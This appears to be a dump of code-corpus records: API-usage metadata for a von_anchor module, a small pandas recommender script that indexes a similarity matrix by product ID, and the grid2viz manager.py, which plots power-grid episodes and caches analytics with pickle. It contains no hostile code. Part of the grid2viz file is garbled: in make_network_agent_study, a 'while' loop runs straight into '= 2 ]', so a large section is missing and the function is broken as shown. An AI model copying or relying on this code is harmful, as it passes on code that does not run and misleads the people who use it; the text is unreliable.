"indy.anoncreds", "line_number": 783, "usage_type": "name"}, {"api_name": "indy.anoncreds.prover_close_credentials_search", "line_number": 790, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 790, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 792, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_get_credentials", "line_number": 838, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 838, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 838, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_get_credential", "line_number": 872, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 872, "usage_type": "name"}, {"api_name": "indy.error.IndyError", "line_number": 873, "usage_type": "name"}, {"api_name": "indy.error.ErrorCode.WalletItemNotFound", "line_number": 874, "usage_type": "attribute"}, {"api_name": "indy.error.ErrorCode", "line_number": 874, "usage_type": "name"}, {"api_name": "von_anchor.error.AbsentCred", "line_number": 879, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_get_credentials_for_proof_req", "line_number": 1003, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 1003, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 1004, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 1010, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentCredDef", "line_number": 1011, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 1042, "usage_type": "call"}, {"api_name": "von_anchor.util.prune_creds_json", "line_number": 1042, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 1044, "usage_type": "call"}, {"api_name": "typing.Set", "line_number": 891, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 1157, "usage_type": "call"}, {"api_name": "von_anchor.codec.canon_wql", "line_number": 1159, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_search_credentials_for_proof_req", "line_number": 1161, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 1161, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 1164, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 1167, "usage_type": "call"}, {"api_name": "von_anchor.wallet.Wallet.DEFAULT_CHUNK", "line_number": 1173, "usage_type": "attribute"}, {"api_name": "von_anchor.wallet.Wallet", "line_number": 1173, "usage_type": "name"}, {"api_name": "von_anchor.wallet.Wallet.DEFAULT_CHUNK", "line_number": 1174, "usage_type": "attribute"}, {"api_name": "von_anchor.wallet.Wallet", "line_number": 1174, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 1175, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_fetch_credentials_for_proof_req", "line_number": 1175, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 1175, "usage_type": "name"}, {"api_name": "von_anchor.wallet.Wallet.DEFAULT_CHUNK", "line_number": 1178, "usage_type": "attribute"}, {"api_name": "von_anchor.wallet.Wallet", "line_number": 1178, "usage_type": "name"}, {"api_name": "indy.anoncreds.prover_close_credentials_search_for_proof_req", "line_number": 1185, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 1185, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 1187, "usage_type": "call"}, {"api_name": "typing.Set", "line_number": 1051, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 1192, "usage_type": "name"}, {"api_name": "von_anchor.error.CredentialFocus", "line_number": 1245, "usage_type": "call"}, {"api_name": "von_anchor.error.CredentialFocus", "line_number": 1256, "usage_type": "call"}, {"api_name": "von_anchor.util.ok_schema_id", "line_number": 1267, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 1269, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 1272, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentSchema", "line_number": 1277, "usage_type": "call"}, {"api_name": "von_anchor.util.ok_cred_def_id", "line_number": 1282, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 1284, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 1287, "usage_type": "call"}, {"api_name": "von_anchor.util.ok_rev_reg_id", "line_number": 1292, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 1294, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1299, "usage_type": "call"}, {"api_name": "von_anchor.error.BadRevStateTime", "line_number": 1304, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentInterval", "line_number": 1312, "usage_type": "call"}, {"api_name": "von_anchor.cache.REVO_CACHE.lock", "line_number": 1318, "usage_type": "attribute"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 1318, "usage_type": "name"}, {"api_name": "von_anchor.cache.REVO_CACHE.get", "line_number": 1320, "usage_type": "call"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 1320, "usage_type": "name"}, {"api_name": "von_anchor.error.AbsentTails", "line_number": 1324, "usage_type": "call"}, {"api_name": "indy.anoncreds.create_revocation_state", "line_number": 1330, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 1330, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 1337, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_create_proof", "line_number": 1340, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 1340, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 1342, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 1343, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 1345, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 1346, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 1347, "usage_type": "call"}, {"api_name": "von_anchor.wallet.Wallet", "line_number": 1377, "usage_type": "call"}]} +{"seq_id": "41052188160", "text": "import pandas as pd\nfrom sklearn.metrics.pairwise import cosine_similarity\n\n# Load the dataset containing customer purchase history\ndataset = pd.read_csv('customer_purchase_history.csv')\n\n# Perform data preprocessing and feature engineering\n# ...\n\n# Create a user-item matrix\nuser_item_matrix = dataset.pivot_table(index='CustomerID', columns='ProductID', values='PurchaseCount')\n\n# Calculate item-item similarity matrix using cosine similarity\nitem_similarity = cosine_similarity(user_item_matrix.fillna(0))\n\n# Function to generate personalized recommendations for a given user\ndef generate_recommendations(user_id, top_n):\n user_ratings = user_item_matrix.loc[user_id]\n similar_items = pd.Series(0, index=user_item_matrix.columns)\n \n # Calculate the weighted average of item ratings based on similarity scores\n for item_id, rating in user_ratings.iteritems():\n similar_items += item_similarity[item_id] * rating\n \n # Exclude items already purchased by the user\n similar_items = similar_items.drop(user_ratings.index)\n \n # Sort items based on their weighted ratings\n top_items = similar_items.sort_values(ascending=False).head(top_n)\n \n return top_items.index.tolist()\n\n# Generate personalized recommendations for a specific user\nuser_id = '12345'\ntop_n = 5\nrecommendations = generate_recommendations(user_id, top_n)\n\n# Print the recommended product IDs\nprint(f\"Recommended Products for User {user_id}:\")\nfor product_id in recommendations:\n print(product_id)\n", "repo_name": "syed-bot/midterm2023", "sub_path": "model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 1509, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_csv", "line_number": 5, "usage_type": "call"}, {"api_name": "sklearn.metrics.pairwise.cosine_similarity", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "42951645536", "text": "import configparser\nimport itertools\nimport json\nimport os\nimport time\nfrom pathlib import Path\nimport pickle\nimport gzip\n\nfrom colorama import Fore, Style\nimport dill\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport plotly.graph_objects as go\nfrom scipy.spatial import ConvexHull\nfrom grid2op.Episode import EpisodeData\nfrom grid2op.PlotGrid import PlotPlotly, PlotMatplot\n\nfrom grid2viz.src.kpi.EpisodeAnalytics import EpisodeAnalytics\n\n# refer to https://github.com/rte-france/Grid2Op/blob/master/getting_started/8_PlottingCapabilities.ipynb for better usage\n\ngraph = None\ngraph_matplotlib = None\n\n\n# TODO: addSubstationColor - integrate that into grid2op Plotgrid\ndef add_substation_color_matplot(subs, plot_helper, fig):\n radius_size = plot_helper._sub_radius\n # fig = plot_helper.plot_layout()\n ax = fig.gca()\n\n for id_sub in subs:\n subName = \"sub_\" + str(id_sub)\n x, y = plot_helper._grid_layout[subName]\n circle = plt.Circle((x, y), int(radius_size), color=\"gold\")\n ax.add_artist(circle)\n\n return fig\n\n\ndef add_substation_color_plotly(subs, plot_helper, fig, color=\"gold\"):\n radius_size = int(plot_helper._sub_radius * 0.8)\n\n for id_sub in subs:\n subName = \"sub_\" + str(id_sub)\n x_center, y_center = plot_helper._grid_layout[subName]\n\n marker_dict = dict(\n size=radius_size,\n color=color,\n showscale=False,\n opacity=0.5,\n )\n fig.add_trace(\n go.Scatter(\n x=[x_center],\n y=[y_center],\n mode=\"markers\",\n text=[subName],\n name=\"sub\" + subName,\n marker=marker_dict,\n showlegend=False,\n )\n )\n return fig\n\ndef add_alarm_area_plotly(line_subs, plot_helper, fig, color=\"gold\"):\n\n x=[]\n y=[]\n for id_sub in line_subs:\n subName = \"sub_\" + str(id_sub)\n x_center, y_center = plot_helper._grid_layout[subName]\n x.append(x_center)\n y.append(y_center)\n\n points = [[lx, ly] for lx, ly in zip(x, y)]\n hull = ConvexHull(points)\n hull_vertices_x = [x[i] for i in hull.vertices]\n hull_vertices_y = [y[i] for i in hull.vertices]\n fig.add_trace(go.Scatter(\n x=hull_vertices_x,\n y=hull_vertices_y,\n marker=dict(color=color, size=2),\n mode=\"markers\",\n # name=\"Women\",\n fill=\"toself\",\n opacity=0.5\n ))\n return fig\n\n\n\ndef make_network(episode, responsive=True):\n \"\"\"\n Create a Plotly network graph with the layout configuration and the selected episode.\n\n :param episode: An episode containing targeted data for the graph.\n :return: Network graph\n \"\"\"\n global graph\n if graph is None:\n graph = PlotPlotly(\n grid_layout=episode.observation_space.grid_layout,\n observation_space=episode.observation_space,\n responsive=responsive,\n )\n return graph\n\n\ndef make_network_matplotlib(episode,timestep=0):\n global graph_matplotlib\n if graph_matplotlib is None:\n graph_matplotlib = PlotMatplot(\n grid_layout=episode.observation_space.grid_layout,\n observation_space=episode.observation_space,\n line_name=False,\n gen_name=False,\n load_name=False,\n )\n return graph_matplotlib\n\n\n######\n# we want a non responsive graph for now in agent_study\n# so we have to define it differently from the global graph in make_network that we don't use here\nimport base64\nimport io\ndef make_network_agent_study(episode, timestep, figure_obs=None, responsive=False,redraw=False):\n # subs_on_bus_2 = np.repeat(False, episode_data.observations[0].n_sub)\n #graph=None\n #if(isMatplotLib):########not working for now. Was trying to use matplotlib to accelerate ploting time\n # buf = io.BytesIO()\n # make_network_scenario_overview(episode,timestep=timestep)\n#\n#\n # # plt.figure(network_graph.number)\n # # plt.close(fig)\n # plt.savefig(buf, format=\"png\")\n # buf.seek(0)\n # #encoded_image = base64.b64encode(buf.read())\n#\n # #fig=encoded_image.decode()\n # data = base64.b64encode(buf.getbuffer()).decode(\"utf8\") # encode to html elements\n # buf.close()\n # return \"data:image/png;base64,{}\".format(data)\n\n observation=episode.observations[timestep]\n\n graph=make_network(episode, responsive)\n graph._sub_radius = 30 # instead of 25 by default\n graph._bus_radius = 10 # instead of 4 by default\n if(figure_obs)and not redraw:# don't redraw it from scratch, just change what is needed\n\n import plotly.colors as pc\n data_fig=figure_obs[\"data\"]#go.Figure(figure_obs)\n\n rho_lines=observation.rho\n n_lines=len(rho_lines)\n\n id_line=0\n i_traces=0\n previous_trace=None\n while id_line= 2\n ]\n fig = add_substation_color_plotly(\n sub_2buses, graph, fig, color=\"green\"\n ) # also other color for subs not in ref topo\n\n if (\"is_alarm\" in episode.action_data_table.columns):\n alarms_lines_area = episode.observations[timestep].alarms_lines_area\n\n light_colors_plotly = [\"lightcoral\", \"lightsalmon\", \"lightpink\"]\n n_colors = len(light_colors_plotly)\n\n if (episode.action_data_table.is_alarm[timestep]):\n\n alarm_zones = episode.action_data_table.alarm_zone[timestep]\n\n for i_zone,zone in enumerate(alarm_zones):\n id_lines_alarm = []\n for idx, line_name in enumerate(episode.observations[timestep].name_line):\n line_alarm_zones = alarms_lines_area[line_name]\n if(zone in line_alarm_zones):\n id_lines_alarm.append(idx)\n line_subs = [episode.observations[timestep].line_ex_to_subid[l_idx] for l_idx in id_lines_alarm]\n line_subs += [episode.observations[timestep].line_or_to_subid[l_idx] for l_idx in id_lines_alarm]\n line_subs = np.unique(line_subs)\n\n area_color= i_zone % n_colors\n fig = add_alarm_area_plotly(line_subs, graph, fig, color=light_colors_plotly[area_color])\n\n return fig\n\n\ndef make_network_agent_overview(episode):\n graph = make_network(episode)\n\n # modified_lines = actions_model.get_modified_lines(episode)\n # line_values = [None] * episode.n_lines\n # for line in modified_lines.index:\n # line_values[np.where(episode.line_names == line)[0][0]] = line\n\n lines_attacked = list(\n episode.attacks_data_table[\"id_lines\"][\n episode.attacks_data_table.attack\n ].unique()\n )\n lines_overflowed_ids = list(\n itertools.chain.from_iterable(episode.total_overflow_ts.line_ids)\n )\n # to color assets on our graph with different colors while not overloading it with information\n # we will use plot_obs instead of plot_info for now\n ####\n # For that we override an observation with the desired values\n obs_colored = episode.observations[0]\n\n # having a rho with value 1.0 give us a red line while 0.7 gives us an orange line and 0.3 a blue line\n rho_to_color = np.array(\n [\n float(0.6) if line in lines_attacked else float(0.3)\n for line in episode.line_names\n ]\n )\n rho_to_color[lines_overflowed_ids] = 1.0\n line_status_colored = np.array(\n [False if line in lines_attacked else True for line in episode.line_names]\n )\n obs_colored.rho = rho_to_color\n obs_colored.line_status = line_status_colored\n\n # network_graph = make_network(episode).plot_info(\n # line_values=[ line if line in lines_attacked else None for line in episode.line_names]\n # #coloring=\"line\"\n # )\n # )\n fig = graph.plot_obs(obs_colored, line_info=None, gen_info=None, load_info=None)\n\n ##########\n # We color subs where we had actions\n sub_name_modified = list(\n itertools.chain.from_iterable(episode.action_data_table.subs_modified)\n )\n sub_id_modified = set([int(str.split(\"_\")[1]) for str in sub_name_modified])\n fig = add_substation_color_plotly(sub_id_modified, graph, fig)\n\n return fig\n\n\ndef make_network_scenario_overview(episode,timestep=0):\n max_loads = (\n episode.load[[\"value\", \"equipement_id\"]]\n .groupby(\"equipement_id\")\n .max()\n .sort_index()\n )\n max_gens = (\n episode.production[[\"value\", \"equipement_id\"]]\n .groupby(\"equipement_id\")\n .max()\n .sort_index()\n )\n lines_in_maintenance = list(\n episode.maintenances[\"line_name\"][episode.maintenances.value == 1].unique()\n )\n\n graph = make_network_matplotlib(episode)\n\n # to color assets on our graph with different colors while not overloading it with information\n # we will use plot_obs instead of plot_info for now\n ####\n # For that we override an observation with the desired values\n obs_colored = episode.observations[timestep]\n\n # having a rho with value 0.1 give us a blue line while 0.5 gives us an orange line\n # line in maintenance would display as dashed lines\n rho_to_color = np.array(\n [\n float(0.0) if line in lines_in_maintenance else float(0.4)\n for line in episode.line_names\n ]\n )\n line_status_colored = np.array(\n [False if line in lines_in_maintenance else True for line in episode.line_names]\n )\n obs_colored.rho = rho_to_color\n obs_colored.line_status = line_status_colored\n\n obs_colored.load_p = np.array(max_loads.value)\n obs_colored.gen_p = np.array(max_gens.value)\n\n network_graph = graph.plot_obs(obs_colored, line_info=None)\n # network_graph=graph.plot_info(\n # #observation=episode.observations[0],\n # load_values=max_loads.values.flatten(),\n # load_unit=\"MW\",\n # gen_values=max_gens.values.flatten(),\n # gen_unit=\"MW\"\n # #line_values=[ 1 if line in lines_in_maintenance else 0 for line in episode.line_names],\n # #coloring=\"line\"\n # )\n\n return network_graph\n\n\nstore = {}\n\n\ndef make_episode(agent, episode_name,with_reboot=False):\n \"\"\"\n Load episode from cache. If not already in, compute episode data\n and save it in cache.\n\n :param agent: Agent Name\n :param episode_name: Name of the studied episode\n :return: Episode with computed data\n \"\"\"\n if is_in_ram_cache(episode_name, agent):\n episode=get_from_ram_cache(episode_name, agent)\n elif is_in_fs_cache(episode_name, agent):\n episode = get_from_fs_cache(episode_name, agent)\n save_in_ram_cache(episode_name, agent, episode)\n #to see evolution of ram footprint\n #from guppy import hpy\n #h = hpy()\n #print(h.heap())\n else:\n episode = compute_episode(episode_name, agent,with_reboot)\n save_in_ram_cache(episode_name, agent, episode)\n\n if(with_reboot and \"reboot\" not in dir(episode)):\n #in that case we need to reload the episode from episode data object\n episode_data = retrieve_episode_from_disk(episode_name, agent)\n episode.decorate_with_reboot(episode_data)\n save_in_ram_cache(episode_name, agent, episode)\n\n return episode\n\n\ndef make_episode_without_decorate(agent, episode_name,save=False):\n \"\"\"\n Load episode from cache without decorating with the EpisodeData attributes\n This is needed to use multiprocessing which pickles/unpickles the results.\n\n :param agent: Agent Name\n :param episode_name: Name of the studied episode\n :return: Episode with computed data (without EpisodeData attributes), EpisodeData instance\n \"\"\"\n if is_in_ram_cache(episode_name, agent):\n if save:\n return None\n return get_from_ram_cache(episode_name, agent)\n elif is_in_fs_cache(episode_name, agent):\n if save:\n return None\n beg = time.time()\n episode_analytics=get_from_fs_cache(episode_name, agent)\n return episode_analytics\n else:\n episode_data = retrieve_episode_from_disk(episode_name, agent)\n if episode_data is not None:\n episode_analytics = EpisodeAnalytics(episode_data, episode_name, agent)\n if save:\n episode_analytics.decorate_light_without_reboot(episode_data)\n save_in_fs_cache(episode_name, agent, episode_analytics)\n return None #to avoid problem with picklalisable issues in multiprocess\n return episode_analytics\n else:\n return None\n\n\ndef clear_fs_cache():\n os.rmdir(cache_dir)\n\n\ndef is_in_fs_cache(episode_name, agent):\n dill_path=get_fs_cached_file(episode_name, agent)\n is_in_fs_cache=(os.path.isfile(dill_path) | os.path.isfile(dill_path+\".bz\"))\n return is_in_fs_cache\n\n\ndef get_fs_cached_file(episode_name, agent):\n episode_dir = os.path.join(cache_dir, episode_name)\n if not os.path.exists(episode_dir):\n os.makedirs(episode_dir,exist_ok=True)\n return os.path.join(episode_dir, agent + \".dill\")\n\ndef save_in_fs_cache(episode_name, agent, episode):\n path = get_fs_cached_file(episode_name, agent)\n\n #####\n #to assess size of objects\n\n #from pympler import asizeof\n #total_size=asizeof.asizeof(episode)\n #for key,value in vars(episode).items():\n # print(key)\n # print(asizeof.asizeof(value))\n # print(int(asizeof.asizeof(value)/total_size*100))\n\n #import bz2\n #import zipfile\n #bz2.BZ2File('bz2_test.pbz2', 'wb') as f:\n with gzip.open(path+\".bz\", \"wb\") as f:\n #with zipfile.ZipFile.write(path+\".zip\") as f:\n #with open(path, \"wb\") as f:\n #dill.dump(episode, f, protocol=4)\n pickle.dump(episode, f, protocol=4)\n\n\n\ndef get_from_fs_cache(episode_name, agent):\n beg = time.time()\n path = get_fs_cached_file(episode_name, agent)\n print(f\"Loading from filesystem cache agent {agent} on scenario {episode_name}...\")\n\n start = time.time()\n\n if(os.path.exists(path + \".bz\")):\n\n with gzip.open(path + \".bz\", \"rb\") as f:\n # with zipfile.ZipFile.open(path + \".zip\") as f:\n print(path)\n episode_analytics=pickle.load(f)\n else:\n with open(path, \"rb\") as f:\n episode_analytics = pickle.load(f)\n\n ######\n #add observation_space only to decorate as it could not be saved in pickle\n agent_path = os.path.join(agents_dir, agent)\n episode_analytics.decorate_obs_act_spaces(agent_path)\n\n\n ##########\n ##Warning for compatibility with older cache version:\n if(\"observations\" not in dir(episode_analytics)):\n print(\"WARNING: the cache management have been updated in grid2viz 1.3.1 for faster loading. \"\n \"You Should delete the old _cache folder and recompute it with latest grid2viz version\")\n episode_analytics.optimize_memory_footprint(opt_obs_act=True)#this adds a bit of 25% loading time overhead,\n # in particular when resetting observations and actions, which only brings a 10% size decrease\n\n #episode_analytics.decorate(episode_data)\n #episode_analytics=decorate(episode_analytics,episode_data)\n\n end = time.time()\n print(\n f\"Agent {agent} on scenario {episode_name} loaded from filesystem cache in: {(end - beg):.1f} s\"\n )\n return episode_analytics\n\n\ndef compute_episode(episode_name, agent,with_reboot=False):\n print(f\"Loading from logs agent {agent} on scenario {episode_name}...\")\n beg = time.time()\n episode_data = retrieve_episode_from_disk(episode_name, agent)\n episode_analytics = EpisodeAnalytics(episode_data, episode_name, agent)\n if with_reboot:\n episode_analytics.decorate_with_reboot(episode_data)\n else:\n episode_analytics.decorate_light_without_reboot(episode_data)\n save_in_fs_cache(episode_name, agent, episode_analytics)\n episode_analytics.decorate_obs_act_spaces(os.path.join(agents_dir, agent))\n end = time.time()\n print(\n f\"Agent {agent} on scenario {episode_name} loaded from logs in: {(end - beg):.1f} s\"\n )\n return episode_analytics\n\n\ndef retrieve_episode_from_disk(episode_name, agent):\n path = os.path.join(agents_dir, agent)\n episode_path = os.path.abspath(os.path.join(path, episode_name))\n if os.path.isdir(episode_path):\n episode_data = EpisodeData.from_disk(path, episode_name)\n return episode_data\n else:\n return None\n\n\ndef is_in_ram_cache(episode_name, agent):\n return make_ram_cache_id(episode_name, agent) in store\n\n\ndef save_in_ram_cache(episode_name, agent, episode):\n store[make_ram_cache_id(episode_name, agent)] = episode\n\n\ndef get_from_ram_cache(episode_name, agent):\n return store[make_ram_cache_id(episode_name, agent)]\n\n\ndef make_ram_cache_id(episode_name, agent):\n return agent + episode_name\n\n\ndef check_all_tree_and_get_meta_and_best(base_dir, agents):\n best_agents = {}\n meta_json = {}\n scenarios = set()\n survival_dic = {}\n attention_dic = {}\n\n for agent in agents:\n survival_dic_agent = {}\n attention_dic_agent = {}\n for scenario_name in os.listdir(os.path.join(base_dir, agent)):\n\n scenario_folder = os.path.join(base_dir, agent, scenario_name)\n if not os.path.isdir(scenario_folder):\n continue\n with open(os.path.join(scenario_folder, \"episode_meta.json\")) as f:\n episode_meta = json.load(fp=f)\n meta_json[scenario_name] = episode_meta\n\n survival_dic_agent[scenario_name] = int(\n int(episode_meta[\"nb_timestep_played\"])\n * 100\n / int(episode_meta[\"chronics_max_timestep\"])\n )\n scenarios.add(scenario_name)\n\n if scenario_name not in best_agents:\n best_agents[scenario_name] = {\n \"value\": -1,\n \"agent\": None,\n \"out_of\": 0,\n \"cum_reward\": -1,\n }\n condition_to_update_best_agent = best_agents[scenario_name][\n \"value\"\n ] < episode_meta[\"nb_timestep_played\"] or (\n best_agents[scenario_name][\"value\"]\n == episode_meta[\"nb_timestep_played\"]\n and best_agents[scenario_name][\"cum_reward\"]\n < episode_meta[\"cumulative_reward\"]\n )\n if condition_to_update_best_agent:\n best_agents[scenario_name][\"value\"] = episode_meta[\n \"nb_timestep_played\"\n ]\n best_agents[scenario_name][\"agent\"] = agent\n best_agents[scenario_name][\"cum_reward\"] = episode_meta[\n \"cumulative_reward\"\n ]\n\n best_agents[scenario_name][\"out_of\"] = (\n best_agents[scenario_name][\"out_of\"] + 1\n )\n other_reward_json_path=os.path.join(scenario_folder, \"other_rewards.json\")\n if os.path.exists(other_reward_json_path):\n with open(other_reward_json_path) as f:\n other_reward_meta = json.load(fp=f)\n last_step_rewards=other_reward_meta[len(other_reward_meta) - 1]\n if 'attention_score' in last_step_rewards.keys():\n attention_dic_agent[scenario_name] = last_step_rewards['attention_score']\n f.close()\n\n\n survival_dic[agent] = survival_dic_agent\n attention_dic[agent] = attention_dic_agent\n\n scenarios=list(scenarios)#instead of set, to avoid type errors when using pandas for instance\n survival_df = pd.DataFrame(columns=agents, index=scenarios)\n attention_df = pd.DataFrame(columns=agents, index=scenarios)#, dtype=np.int64)\n for agent in agents:\n survival_dic_agent = survival_dic[agent]\n attention_dic_agent = attention_dic[agent]\n for (scenario, survival_time) in survival_dic_agent.items():\n survival_df.loc[scenario][agent] = survival_time\n if len(attention_dic_agent) != 0:\n for (scenario, attention_score) in attention_dic_agent.items():\n attention_df.loc[scenario][agent] = np.round(attention_score,2)\n\n survival_df = survival_df.fillna(-1) # To be able to cast as int below.\n survival_df = survival_df.astype(int)\n\n return meta_json, best_agents, survival_df, attention_df\n\ndef make_cache(scenarios,agents,n_cores,cache_dir,agent_selection=None):\n\n if(agent_selection is not None):\n agents=[agent for agent in agents if agent in agent_selection]\n\n from pathos.multiprocessing import ProcessPool\n\n if not os.path.exists(cache_dir):\n print(\"Starting Multiprocessing for reading the best agent of each scenario\")\n\n # TODO: tous les agents n'ont pas forcément tourner sur exactement tous les mêmes scenarios\n # Eviter une erreur si un agent n'a pas tourné sur un scenario\n agent_scenario_list = [\n (agent, scenario) for agent in agents for scenario in scenarios\n ]\n\n agents_data = []\n if n_cores == 1: # no multiprocess useful for debug if needed\n i = 0\n for agent_scenario in agent_scenario_list:\n agents_data.append(\n make_episode_without_decorate(agent_scenario[0], agent_scenario[1],save=True)\n )\n i += 1\n else:\n pool = ProcessPool(n_cores)\n list(\n pool.imap(\n make_episode_without_decorate,\n [agent_scenario[0] for agent_scenario in agent_scenario_list], # agents\n [agent_scenario[1] for agent_scenario in agent_scenario_list],\n [True for agent_scenario in agent_scenario_list],\n )\n ) # scenarios #we go over all agents and all scenarios for each agent\n pool.close()\n print(\"Multiprocessing done\")\n\n\n\"\"\"\nInitialisation routine\n\"\"\"\n\"\"\" Parsing of config file\"\"\"\nif not \"GRID2VIZ_ROOT\" in os.environ:\n #get grid2viz package path\n pkg_root_dir = os.getcwd()#os.path.dirname(os.path.abspath((os.path.join(os.path.abspath(__file__), os.pardir))))\n os.environ[\"GRID2VIZ_ROOT\"] = pkg_root_dir\n path_cfg = os.path.join(os.environ[\"GRID2VIZ_ROOT\"], \"config.ini\")\nelse:\n path_cfg = os.path.join(os.environ[\"GRID2VIZ_ROOT\"], \"config.ini\")\n\nparser = configparser.ConfigParser()\nprint(\n Fore.BLUE + Style.BRIGHT + \"The config file used is located at: {}\".format(path_cfg)\n)\nparser.read(path_cfg)\n\nagents_dir = parser.get(\"DEFAULT\", \"agents_dir\")\nprint(Fore.BLUE + \"Agents data used is located at: {}\".format(agents_dir))\ncache_dir = os.path.join(agents_dir, \"_cache\")\n\"\"\"Parsing of agent folder tree\"\"\"\nagents = sorted(\n [\n file\n for file in os.listdir(agents_dir)\n if os.path.isdir(os.path.join(agents_dir, file)) and not file.startswith(\"_\")\n ]\n)\nmeta_json, best_agents, survival_df, attention_df = check_all_tree_and_get_meta_and_best(\n agents_dir, agents\n)\nscenarios = []\nscenarios_agent = {}\nagent_scenario = {}\n\ntry:\n n_cores = int(parser.get(\"DEFAULT\", \"n_cores\"))\nexcept configparser.NoOptionError:\n n_cores = 1\n\nfor agent in agents:\n scen_path = os.path.join(agents_dir, agent)\n scens = [\n file\n for file in os.listdir(scen_path)\n if os.path.isdir(os.path.join(scen_path, file))\n ]\n scenarios_agent[agent] = scens\n for scen in scens:\n if scen not in agent_scenario:\n agent_scenario[scen] = []\n if agent not in agent_scenario[scen]:\n agent_scenario[scen].append(agent)\n scenarios = scenarios + scens\n\nscenarios = set(scenarios)\nenv_path = parser.get(\"DEFAULT\", \"env_dir\")\n# Create a .grid2viz directory in the user home directory\ngrid2viz_home_directory = Path.home() / \".grid2viz\"\ngrid2viz_home_directory.mkdir(parents=False, exist_ok=True)\n", "repo_name": "rte-france/grid2viz", "sub_path": "grid2viz/src/manager.py", "file_name": "manager.py", "file_ext": "py", "file_size_in_byte": 26555, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 35, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.pyplot.Circle", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Scatter", "line_number": 57, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 57, "usage_type": "name"}, {"api_name": "scipy.spatial.ConvexHull", "line_number": 80, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Scatter", "line_number": 83, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 83, "usage_type": "name"}, {"api_name": "grid2op.PlotGrid.PlotPlotly", "line_number": 105, "usage_type": "call"}, {"api_name": "grid2op.PlotGrid.PlotMatplot", "line_number": 116, "usage_type": "call"}, {"api_name": "plotly.colors.sequential", "line_number": 171, "usage_type": "attribute"}, {"api_name": "plotly.colors", "line_number": 171, "usage_type": "name"}, {"api_name": "plotly.colors.sequential", "line_number": 172, "usage_type": "attribute"}, {"api_name": "plotly.colors", "line_number": 172, "usage_type": "name"}, {"api_name": "plotly.colors.sequential", "line_number": 173, "usage_type": "attribute"}, {"api_name": "plotly.colors", "line_number": 173, "usage_type": "name"}, {"api_name": "numpy.clip", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 180, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 208, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 208, "usage_type": "name"}, {"api_name": "itertools.chain.from_iterable", "line_number": 223, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 223, "usage_type": "attribute"}, {"api_name": "numpy.unique", "line_number": 261, "usage_type": "call"}, {"api_name": "itertools.chain.from_iterable", "line_number": 283, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 283, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 292, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 299, "usage_type": "call"}, {"api_name": "itertools.chain.from_iterable", "line_number": 315, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 315, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 350, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 356, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 362, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 363, "usage_type": "call"}, {"api_name": "time.time", "line_number": 429, "usage_type": "call"}, {"api_name": "grid2viz.src.kpi.EpisodeAnalytics.EpisodeAnalytics", "line_number": 435, "usage_type": "call"}, {"api_name": 